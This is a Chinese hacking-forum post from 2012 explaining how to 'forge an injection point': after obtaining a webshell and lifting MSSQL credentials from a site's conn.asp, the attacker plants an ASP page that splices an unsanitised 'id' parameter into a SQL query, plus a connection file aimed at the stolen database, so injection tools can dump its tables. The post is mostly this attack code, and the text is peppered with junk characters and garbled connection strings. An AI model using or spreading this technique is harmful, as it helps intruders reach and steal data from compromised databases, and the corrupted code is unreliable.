中国网络渗透测试联盟

标题: 伪造注入点方法 [打印本页]

作者: admin    时间: 2012-9-13 17:53
标题: 伪造注入点方法
首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表。因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:
% Z. n8 i5 A( ~1 O1 ]5 c9 b7 GASP/Visual Basic代码. k. s: H4 r. u" ]* O
<!--#include file="xx.asp"-->   
- s5 u, g3 [  i' J<%    0 C! X) p: u- p% J5 n/ l; y; R
set rs=server.createobject("ADODB.recordset")    3 _8 c% i9 B. ^9 Z
id = request("id")    4 M* f* i3 G' X" _) f3 g$ u
strSQL = "select * from admin where id=" & id   
1 n# w& ?  V. Jrs.open strSQL,conn,1,3      ]" }6 [- P/ ]4 h9 A( K/ Q# w1 a
rs.close    1 Y2 \3 s9 p6 G; q- o
%>  
5 b7 u; @2 ~* P" m7 D- r& ?4 j把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在。你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!( Z, K- c3 n7 Y" x+ b# B' W
然后就要构造一个连接数据库的文件了,代码如下:6 n; n2 X' K# @7 K
ASP/Visual Basic代码
+ [; |: {9 h& G9 e<%            ' O+ r. H( g2 a% X) D+ F( |) f
strSQLServerName = "000.000.000.000"     '服务器名称或地址    4 |. P! g3 h6 }0 d) c# K
strSQLDBUserName = "sqlname"         '数据库帐号   
" {' }! N1 u# F$ ystrSQLDBPassword = "sqlpass"         '数据库密码   
7 @' a! D/ M% B, n  W0 mstrSQLDBName = "sqldataname"           '数据库名称    ) C8 ?3 z1 w  R5 m, v/ V3 o
Set conn = Server.CreateObject("ADODB.Connection")    ' S7 ^& K  P7 J4 w) D' Q9 M
strCon = "rovider=SQLOLEDB.1ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & "assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"   
+ I9 N) ]* e  X) q7 h* }' U6 ?conn.open strCon    ( N0 ~1 \! a, ~0 i3 h
%>  ) x# m7 a8 f* q9 N
这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。就这样,正常情况下,就OK了,伪造成功% z: @5 o' {& u$ M





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2